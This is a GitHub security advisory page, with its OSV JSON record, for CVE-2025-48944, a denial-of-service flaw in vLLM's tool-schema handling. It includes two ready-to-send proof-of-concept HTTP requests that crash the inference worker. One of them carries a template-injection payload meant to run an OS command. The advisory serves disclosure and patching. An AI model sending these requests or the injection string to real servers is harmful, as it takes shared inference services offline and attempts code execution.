GHSA-VRQ3-R879-7M65
Vulnerability from github – Published: 2025-05-28 19:42 – Updated: 2025-05-30 21:41Summary
The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.
Details
The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:
RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"
The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.
For example, the following inputs will crash the worker:
Unclosed {, [, or (
Closed:{} and []
Here are some of runtime errors on the crash depending on what gets injected:
RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed. RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count. RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.
PoC
Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for: POST /v1/chat/completions HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Content-Length: 579 Origin: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers Connection: keep-alive
{ "model": "mistral-nemo-instruct", "messages": [{ "role": "user", "content": "crash via type" }], "tools": [ { "type": "function", "function": { "name": "crash01", "parameters": { "type": "object", "properties": { "a": { "type": "something" } } } } } ], "tool_choice": { "type": "function", "function": { "name": "crash01", "arguments": { "a": "test" } } }, "stream": false, "max_tokens": 1 }
Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.
POST /v1/chat/completions HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Content-Length: 718 Origin: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers Connection: keep-alive
{ "model": "mistral-nemo-instruct", "messages": [ { "role": "user", "content": "Crash via Pattern" } ], "tools": [ { "type": "function", "function": { "name": "crash02", "parameters": { "type": "object", "properties": { "a": { "type": "string", "pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}" } } } } } ], "tool_choice": { "type": "function", "function": { "name": "crash02" } }, "stream": false, "max_tokens": 32, "temperature": 0.2, "top_p": 1, "n": 1 }
Impact
Backend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests.
Fix
- https://github.com/vllm-project/vllm/pull/17623
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "vllm"
},
"ranges": [
{
"events": [
{
"introduced": "0.8.0"
},
{
"fixed": "0.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-48944"
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-28T19:42:32Z",
"nvd_published_at": "2025-05-30T19:15:30Z",
"severity": "MODERATE"
},
"details": "### Summary\nThe vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the \"pattern\" and \"type\" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. \n\n### Details\nThe \"type\" field is expected to be one of: \"string\", \"number\", \"object\", \"boolean\", \"array\", or \"null\". Supplying any other value will cause the worker to crash with the following error:\n\nRuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type \"something_or_nothing\"\n\nThe \"pattern\" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.\n\nFor example, the following inputs will crash the worker:\n\nUnclosed {, [, or (\n\nClosed:{} and []\n\nHere are some of runtime errors on the crash depending on what gets injected:\n\nRuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.\nRuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.\nRuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.\n\n### PoC\nHere is the POST request using the type field to crash the worker. Note the type field is set to \"something\" rather than the expected types it is looking for:\nPOST /v1/chat/completions HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \nContent-Type: application/json\nContent-Length: 579\nOrigin: \nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\nTe: trailers\nConnection: keep-alive\n\n{\n \"model\": \"mistral-nemo-instruct\",\n \"messages\": [{ \"role\": \"user\", \"content\": \"crash via type\" }],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"crash01\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"a\": {\n \"type\": \"something\"\n }\n }\n }\n }\n }\n ],\n \"tool_choice\": {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"crash01\",\n \"arguments\": { \"a\": \"test\" }\n }\n },\n \"stream\": false,\n \"max_tokens\": 1\n}\n\nHere is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.\n\nPOST /v1/chat/completions HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \nContent-Type: application/json\nContent-Length: 718\nOrigin: \nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\nTe: trailers\nConnection: keep-alive\n\n{\n \"model\": \"mistral-nemo-instruct\",\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"Crash via Pattern\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"crash02\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"a\": {\n \"type\": \"string\",\n\"pattern\": \"{{ __import__(\u0027os\u0027).system(\u0027echo RCE_OK \u003e /tmp/pwned\u0027) or \u0027SAFE\u0027 }}\"\n }\n }\n }\n }\n }\n ],\n \"tool_choice\": {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"crash02\"\n }\n },\n \"stream\": false,\n \"max_tokens\": 32,\n \"temperature\": 0.2,\n \"top_p\": 1,\n \"n\": 1\n}\n\n### Impact\nBackend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests. \n\n### Fix\n\n* https://github.com/vllm-project/vllm/pull/17623",
"id": "GHSA-vrq3-r879-7m65",
"modified": "2025-05-30T21:41:06Z",
"published": "2025-05-28T19:42:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-vrq3-r879-7m65"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48944"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/pull/17623"
},
{
"type": "PACKAGE",
"url": "https://github.com/vllm-project/vllm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "vLLM Tool Schema allows DoS via Malformed pattern and type Fields"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.